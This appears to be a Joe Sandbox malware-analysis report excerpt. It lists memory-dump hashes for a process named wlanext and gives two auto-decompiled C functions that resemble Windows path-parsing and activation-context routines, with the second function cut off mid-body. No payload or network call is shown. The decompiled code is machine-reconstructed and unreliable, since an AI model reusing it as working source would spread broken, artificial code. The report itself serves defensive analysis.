                                  0x035b6360
                                  0x00000000
                                  0x035b6360
                                  0x035b5c10
                                  0x035b5c10
                                  0x035b63da
                                  0x035b63e5
                                  0x035b63e5

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee8ce77f4a6c5ed922b58e4b4475de524a18df1d48e86b2d79f734d3252401e0
                                  • Instruction ID: 96ce85b31f2bd24a728dde28c6cac4db3d1927b94ca8392c84cae3bd08351101
                                  • Opcode Fuzzy Hash: ee8ce77f4a6c5ed922b58e4b4475de524a18df1d48e86b2d79f734d3252401e0
                                  • Instruction Fuzzy Hash: 1D425975900229CFDB24CF68D880BA9F7B1FF49304F1985EAD84DAB252E7349A85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03504120 Relevance: .4, Instructions: 444COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E03504120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x35dd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0351F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03506E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03504620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03506E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M035045F8))) {
												case 0:
													_v568 = 0x34c1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x34c11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03504620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0352F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0352F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E034E52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E034FEB70(1, 0x35d79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E034FAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E035295D0();
																			L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0352B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03523D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0352B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                  0x03504128
                                  0x03504135
                                  0x0350413c
                                  0x03504141
                                  0x03504145
                                  0x03504147
                                  0x0350414e
                                  0x03504151
                                  0x03504159
                                  0x0350415c
                                  0x03504160
                                  0x03504164
                                  0x03504168
                                  0x0350416c
                                  0x0350417f
                                  0x03504181
                                  0x0350446a
                                  0x0350446a
                                  0x0350418c
                                  0x03504195
                                  0x03504199
                                  0x03504432
                                  0x03504439
                                  0x0350443d
                                  0x03504442
                                  0x03504447
                                  0x00000000
                                  0x0350419f
                                  0x035041a3
                                  0x035041b1
                                  0x035041b9
                                  0x035041bd
                                  0x035045db
                                  0x035045db
                                  0x00000000
                                  0x035041c3
                                  0x035041c3
                                  0x035041ce
                                  0x035041d4
                                  0x0354e138
                                  0x0354e13e
                                  0x0354e169
                                  0x0354e16d
                                  0x0354e19e
                                  0x0354e16f
                                  0x0354e16f
                                  0x0354e175
                                  0x0354e179
                                  0x0354e18f
                                  0x0354e193
                                  0x00000000
                                  0x0354e199
                                  0x00000000
                                  0x0354e199
                                  0x0354e193
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035041da
                                  0x035041da
                                  0x035041df
                                  0x035041e4
                                  0x035041ec
                                  0x03504203
                                  0x03504207
                                  0x0354e1fd
                                  0x03504222
                                  0x03504226
                                  0x0354e1f3
                                  0x0354e1f3
                                  0x0350422c
                                  0x0350422c
                                  0x03504233
                                  0x0354e1ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03504239
                                  0x03504239
                                  0x03504239
                                  0x03504239
                                  0x03504233
                                  0x03504226
                                  0x035041ee
                                  0x035041ee
                                  0x035041f4
                                  0x03504575
                                  0x0354e1b1
                                  0x0354e1b1
                                  0x00000000
                                  0x0350457b
                                  0x0350457b
                                  0x03504582
                                  0x0354e1ab
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03504588
                                  0x03504588
                                  0x0350458c
                                  0x0354e1c4
                                  0x0354e1c4
                                  0x00000000
                                  0x03504592
                                  0x03504592
                                  0x03504599
                                  0x0354e1be
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0350459f
                                  0x0350459f
                                  0x035045a3
                                  0x0354e1d7
                                  0x0354e1e4
                                  0x00000000
                                  0x035045a9
                                  0x035045a9
                                  0x035045b0
                                  0x0354e1d1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035045b6
                                  0x035045b6
                                  0x035045b6
                                  0x00000000
                                  0x035045b6
                                  0x035045b0
                                  0x035045a3
                                  0x03504599
                                  0x0350458c
                                  0x03504582
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035041f4
                                  0x0350423e
                                  0x03504241
                                  0x035045c0
                                  0x035045c4
                                  0x00000000
                                  0x035045ca
                                  0x035045ca
                                  0x00000000
                                  0x0354e207
                                  0x0354e20f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035045d1
                                  0x00000000
                                  0x00000000
                                  0x035045ca
                                  0x00000000
                                  0x03504247
                                  0x03504247
                                  0x03504247
                                  0x03504249
                                  0x03504249
                                  0x03504249
                                  0x03504251
                                  0x03504251
                                  0x03504257
                                  0x0350425f
                                  0x0350426e
                                  0x03504270
                                  0x0350427a
                                  0x0354e219
                                  0x0354e219
                                  0x03504280
                                  0x03504282
                                  0x03504456
                                  0x035045ea
                                  0x00000000
                                  0x035045f0
                                  0x0354e223
                                  0x00000000
                                  0x0354e223
                                  0x0350445c
                                  0x0350445c
                                  0x00000000
                                  0x0350445c
                                  0x00000000
                                  0x03504288
                                  0x0350428c
                                  0x0354e298
                                  0x03504292
                                  0x03504292
                                  0x0350429e
                                  0x035042a3
                                  0x035042a7
                                  0x035042ac
                                  0x0354e22d
                                  0x035042b2
                                  0x035042b2
                                  0x035042b9
                                  0x035042bc
                                  0x035042c2
                                  0x035042ca
                                  0x035042cd
                                  0x035042cd
                                  0x035042d4
                                  0x0350433f
                                  0x0350433f
                                  0x035042d6
                                  0x035042d6
                                  0x035042d9
                                  0x035042dd
                                  0x035042eb
                                  0x0354e23a
                                  0x035042f1
                                  0x03504305
                                  0x0350430d
                                  0x03504315
                                  0x03504318
                                  0x0350431f
                                  0x03504322
                                  0x0350432e
                                  0x0350433b
                                  0x0350433b
                                  0x00000000
                                  0x0350432e
                                  0x035042eb
                                  0x0350434c
                                  0x0350434e
                                  0x03504352
                                  0x03504359
                                  0x0350435e
                                  0x03504361
                                  0x0350436e
                                  0x0350438a
                                  0x0350438e
                                  0x03504396
                                  0x0350439e
                                  0x035043a1
                                  0x035043ad
                                  0x035043bb
                                  0x035043bb
                                  0x035043ad
                                  0x0350436e
                                  0x035043bf
                                  0x035043c5
                                  0x03504463
                                  0x03504463
                                  0x035043ce
                                  0x035043d5
                                  0x035043d9
                                  0x035043df
                                  0x03504475
                                  0x03504479
                                  0x03504491
                                  0x03504491
                                  0x03504479
                                  0x035043e5
                                  0x035043eb
                                  0x035043f4
                                  0x035043f6
                                  0x035043f9
                                  0x035043fc
                                  0x035043ff
                                  0x035044e8
                                  0x035044ed
                                  0x035044f3
                                  0x0354e247
                                  0x00000000
                                  0x035044f9
                                  0x03504504
                                  0x03504508
                                  0x0350450f
                                  0x0354e269
                                  0x00000000
                                  0x03504515
                                  0x03504519
                                  0x03504531
                                  0x03504534
                                  0x03504537
                                  0x0350453e
                                  0x03504541
                                  0x0350454a
                                  0x0354e255
                                  0x0354e255
                                  0x0354e25b
                                  0x0354e25e
                                  0x0354e261
                                  0x0354e261
                                  0x03504555
                                  0x03504559
                                  0x0350455d
                                  0x0354e26d
                                  0x0354e270
                                  0x0354e274
                                  0x0354e27a
                                  0x0354e27d
                                  0x0354e28e
                                  0x0354e28e
                                  0x03504563
                                  0x03504563
                                  0x03504569
                                  0x03504569
                                  0x00000000
                                  0x0350455d
                                  0x0350450f
                                  0x00000000
                                  0x035044f3
                                  0x035043ff
                                  0x03504405
                                  0x03504405
                                  0x03504405
                                  0x035042ac
                                  0x0350428c
                                  0x03504282
                                  0x03504407
                                  0x0350440d
                                  0x0354e2af
                                  0x0354e2af
                                  0x03504413
                                  0x03504413
                                  0x00000000
                                  0x035041d4
                                  0x00000000
                                  0x035041c3
                                  0x035041bd
                                  0x03504415
                                  0x03504415
                                  0x03504416
                                  0x03504417
                                  0x03504429
                                  0x0350416e
                                  0x0350416e
                                  0x03504175
                                  0x03504498
                                  0x0350449f
                                  0x0354e12d
                                  0x00000000
                                  0x0354e133
                                  0x00000000
                                  0x0354e133
                                  0x035044a5
                                  0x035044a5
                                  0x035044aa
                                  0x00000000
                                  0x035044bb
                                  0x035044ca
                                  0x035044d6
                                  0x035044d7
                                  0x035044d8
                                  0x035044e3
                                  0x035044e3
                                  0x035044aa
                                  0x0350417b
                                  0x0350417b
                                  0x0350417b
                                  0x00000000
                                  0x0350417b
                                  0x03504175
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1f5b2c492b183cd15075828132c4d468b0031c7b317f565d47e4e6724f7ca66
                                  • Instruction ID: 99530d46b56d9ac0474e36cb067bb2d1cd8f65950ae03a3200b30a006c6eb4ca
                                  • Opcode Fuzzy Hash: f1f5b2c492b183cd15075828132c4d468b0031c7b317f565d47e4e6724f7ca66
                                  • Instruction Fuzzy Hash: A4F170B46083518BC724CF5AD481A3AB7F5FF88704F49496EF586CB2A0E735D891CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035120A0 Relevance: .4, Instructions: 420COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E035120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x35d8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03512EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03512EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E034E58EC(_t240);
									_t221 =  *0x35d5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x35d5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03524A2C(0x35d6e40, 0x3524b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03507D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x34c5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0351F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0351F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03567016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03502400(_t267 + 0x20);
															}
															L03502400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03512397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03502280(_t134, 0x35d8608);
									__eflags =  *0x35d6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E034FFFB0(_t198, _t241, 0x35d8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x35d6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x35d8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03516B90(_t210,  &_v64);
										_t262 =  *0x35d8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0351E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E035297C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
